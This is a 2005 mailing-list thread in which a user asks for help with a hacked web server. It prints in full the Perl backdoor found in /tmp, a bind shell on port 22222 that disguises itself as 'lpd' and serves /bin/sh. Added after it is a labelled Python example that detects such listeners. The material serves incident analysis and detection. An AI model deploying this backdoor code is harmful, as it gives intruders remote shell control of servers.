On Tue, 15 Nov 2005, Vidar Tyldum Hansen wrote:

>> A friend who has an httpd server based on TSL 2.2 has received this
>> mail:
>>
>> -------------------------------------------
>> Subject: Your_host_have_been_attacked
>>
>> Your host have been attacked by pv script. Look on netstat -anp for
>> process listen on 4123 port
>>
>> -------------------------------------------
>>
>>
>> He tells me that there is a process listening on port 4123 and another on
>> 22222. Stopping httpd and killing the process that owns the daemons seems
>> to temporarily "solve" the problem.
>> He said that the processes are owned by httpd.
>> He is now busy rebuilding a new box to migrate the data to, so he asked
>> me to collect info on the "pv script".
>> Any hints?
>
> Name of process? Where does it live on the filesystem?

I haven't seen the server; he tells me that the process is named "perl"
and that he found a perl script in /tmp.

> What does a 'strings filename' reveal?

Can you explain this?

> Go through the access-logs for apache. My guess is that there was a
> badly written PHP app on it and that led to remote execution
> vulnerabilities.

Suggested. Reply: "Yes, but parsing some GB of logs without an idea of what
exactly to search for ..."

> The fact that all the parasites ran as httpd and not root points very
> hard in that direction.

This is what my friend has found in /tmp:


---------pv2------------------------
#!/usr/bin/perl
use Socket;
$port=22222;
$proto=getprotobyname('tcp');
$cmd="lpd";
$system='/bin/sh';
$0=$cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
"setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
   open(STDIN, ">&CLIENT");
   open(STDOUT, ">&CLIENT");
   open(STDERR, ">&CLIENT");
   system($system);
   close(STDIN);
   close(STDOUT);
   close(STDERR);
}

------------------------------------

If anyone can translate for people who don't "speak" enough perl to
fully understand ... ;-)


Regards, B.
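As an added, defender-side example (not code from this thread or from Trustix), here is a Python check for what the warning mail describes: a LISTEN socket on a port the web server should not own, held under the httpd uid by an interpreter whose displayed name no longer matches its binary, which is exactly what the pv2 script's $0="lpd" achieves. The /proc/net/tcp excerpt, the process table and the httpd uid 48 are constructed sample data, not values from the incident.

```python
import os

INTERPRETERS = {"perl", "python", "python3", "sh", "bash", "ruby"}

# Constructed /proc/net/tcp excerpt: port 80 (0x0050) held by httpd as root,
# plus 22222 (0x56CE) and 4123 (0x101B) as in the incident; state 0A = LISTEN.
# A live file carries more trailing columns; only the first ten are used.
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1
   1: 00000000:56CE 00000000:0000 0A 00000000:00000000 00:00000000 00000000    48        0 22222 1
   2: 00000000:101B 00000000:0000 0A 00000000:00000000 00:00000000 00000000    48        0 33333 1
"""
# Constructed process table: (pid, comm, exe, socket inodes held open),
# i.e. what /proc/<pid>/comm, /proc/<pid>/exe and /proc/<pid>/fd/* show.
SAMPLE_PROCS = [
    (1234, "httpd", "/usr/sbin/httpd", {11111}),
    (4321, "lpd", "/usr/bin/perl", {22222}),   # $0="lpd" hides the perl name
    (4322, "perl", "/usr/bin/perl", {33333}),
]

def listening_sockets(proc_net_tcp):
    """Map socket inode -> (port, uid) for every LISTEN entry in /proc/net/tcp."""
    out = {}
    for line in proc_net_tcp.splitlines()[1:]:
        f = line.split()
        if len(f) >= 10 and f[3] == "0A":
            out[int(f[9])] = (int(f[1].rsplit(":", 1)[1], 16), int(f[7]))
    return out

def suspicious_listeners(proc_net_tcp, procs, web_uid=48, web_ports=(80, 443)):
    """Return sorted (port, pid, reason) for listeners that deserve a look.
    web_uid=48 is an assumed httpd uid; adjust it to the host's own."""
    sockets, hits = listening_sockets(proc_net_tcp), []
    for pid, comm, exe, inodes in procs:
        for ino in inodes & set(sockets):
            port, uid = sockets[ino]
            base, why = os.path.basename(exe), []
            if uid == web_uid and port not in web_ports:
                why.append("web-server uid listening on unexpected port")
            if base in INTERPRETERS and comm != base:
                why.append(f"{base} process shows name {comm!r}")
            if why:
                hits.append((port, pid, "; ".join(why)))
    return sorted(hits)

if __name__ == "__main__":
    for port, pid, why in suspicious_listeners(SAMPLE_TCP, SAMPLE_PROCS):
        print(f"port {port} pid {pid}: {why}")
```

On a live Linux box the same tuples come from walking /proc/<pid>/comm, /proc/<pid>/exe and the socket:[inode] links under /proc/<pid>/fd, which needs root to see other users' processes, just as netstat -anp does.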



_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
